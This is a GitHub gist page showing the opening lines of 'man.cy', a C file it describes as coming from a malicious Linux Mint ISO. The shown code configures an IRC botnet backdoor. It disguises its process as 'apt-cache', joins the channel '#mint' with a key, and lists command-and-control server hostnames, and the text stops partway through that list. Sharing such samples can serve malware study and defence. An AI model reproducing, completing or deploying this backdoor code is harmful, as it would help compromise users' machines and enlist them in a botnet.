Skip to content

Instantly share code, notes, and snippets.

View MikeDawg's full-sized avatar

MikeDawg MikeDawg

  • Great Salt Lake City, Utah Area
View GitHub Profile
@MikeDawg
MikeDawg / man.cy
Created February 25, 2016 18:36 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",